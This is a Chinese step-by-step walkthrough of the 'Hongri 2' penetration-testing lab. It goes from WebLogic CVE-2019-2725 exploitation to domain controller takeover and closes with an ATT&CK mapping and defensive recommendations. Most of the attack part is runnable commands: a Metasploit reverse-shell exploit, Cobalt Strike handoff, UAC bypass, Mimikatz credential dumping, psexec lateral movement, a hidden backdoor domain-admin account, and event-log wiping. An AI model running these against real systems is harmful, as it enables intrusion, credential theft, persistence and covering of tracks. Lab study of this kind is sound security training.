从WebLogic反序列化到域控：手把手复现红日2靶场ATTCK实战路径

从WebLogic反序列化到域控渗透实战红日2靶场ATTCK技术链深度解析当企业Web服务器成为攻击者突破内网的跳板时真正的威胁才刚刚开始。红日2靶场构建的仿真企业网络环境完整复现了从外网WebLogic漏洞利用到内网域控渗透的经典攻击路径。本文将基于ATTCK框架的技术阶段划分逐层拆解攻击者在真实攻防中可能采用的战术组合与工具链。1. 环境准备与初始访问突破红日2靶场模拟了典型的企业网络架构边界部署WebLogic服务器的Windows 2008主机192.168.111.80、内网域控制器10.10.10.10以及Windows 7客户端10.10.10.201。攻击者Kali主机192.168.111.128需要从外部网络发起渗透。关键工具准备清单WeblogicScan漏洞扫描工具Metasploit Framework 6.xCobalt Strike 4.xMimikatz 2.2.0Impacket工具套件通过Nmap扫描发现目标开放7001端口运行WebLogic 10.3.6.0存在CVE-2019-2725反序列化漏洞。使用以下命令进行漏洞验证python3 WeblogicScan.py -u 192.168.111.80 -p 70012. WebLogic漏洞利用与初始立足点建立CVE-2019-2725漏洞允许攻击者通过精心构造的序列化数据在目标服务器上执行任意代码。Metasploit中对应的利用模块配置如下use exploit/multi/misc/weblogic_deserialize_asyncresponseservice set RHOSTS 192.168.111.80 set LHOST 192.168.111.128 set payload windows/meterpreter/reverse_tcp exploit成功获取Meterpreter会话后需要将shell迁移到Cobalt Strike实现持久化控制。通过payload_inject模块将会话派发到CS监听器use exploit/windows/local/payload_inject set session 1 set LHOST 192.168.111.128 set LPORT 9090 set PAYLOAD windows/meterpreter/reverse_http run权限提升关键步骤获取当前进程令牌信息getuid检查系统补丁情况run post/windows/gather/enum_patches尝试BypassUAC技术exploit/windows/local/bypassuac3. 内网信息收集与凭证窃取通过已控制的Web服务器进行内网探测发现关键网络信息主机IP操作系统开放端口疑似角色10.10.10.10Windows 201253,88,135,445,389,636域控10.10.10.201Windows 7445,3389客户端使用Mimikatz提取内存凭证时需注意AV规避技巧# 绕过内存扫描的执行方式 Invoke-Mimikatz -Command privilege::debug sekurlsa::logonpasswords获取到关键凭证对Web服务器本地管理员administrator/1qazWSX域管理员账户de1ay/1qazWSX4. 横向移动与域控攻陷利用获取的域凭证通过SMB协议进行横向移动。Impacket工具包中的psexec.py是理想选择python psexec.py de1ay:1qazWSX10.10.10.10域环境攻击技术矩阵ATTCK技术ID技术名称实施工具防御建议T1078有效账户利用Mimikatz启用LSA保护T1558黄金票据攻击Impacket限制KRBTGT账户权限T1562.001禁用安全工具PowerShell实施代码签名策略T1021.002SMB/Windows共享传播PsExec关闭不必要的SMB服务在域控上执行最终权限维持操作# 创建隐藏后门账户 net user sysbackup Pssw0rd123 /add /domain net group Domain Admins sysbackup /add /domain5. 攻击痕迹清理与防御建议完整的攻击链完成后专业渗透测试人员需要清除操作痕迹。针对Windows系统需重点清理事件日志wevtutil cl security文件时间戳timestomp -b注册表修改记录企业防御体系构建要点在WebLogic服务器部署WAF规则拦截反序列化攻击实施网络分段隔离关键服务器启用Windows Defender攻击面减少规则部署SIEM系统监控异常登录行为实际测试中发现当WebLogic服务以域管理员权限运行时攻击者获取的初始shell权限可直接用于域渗透这种情况在中小型企业中尤为常见。建议企业遵循最小权限原则配置服务账户。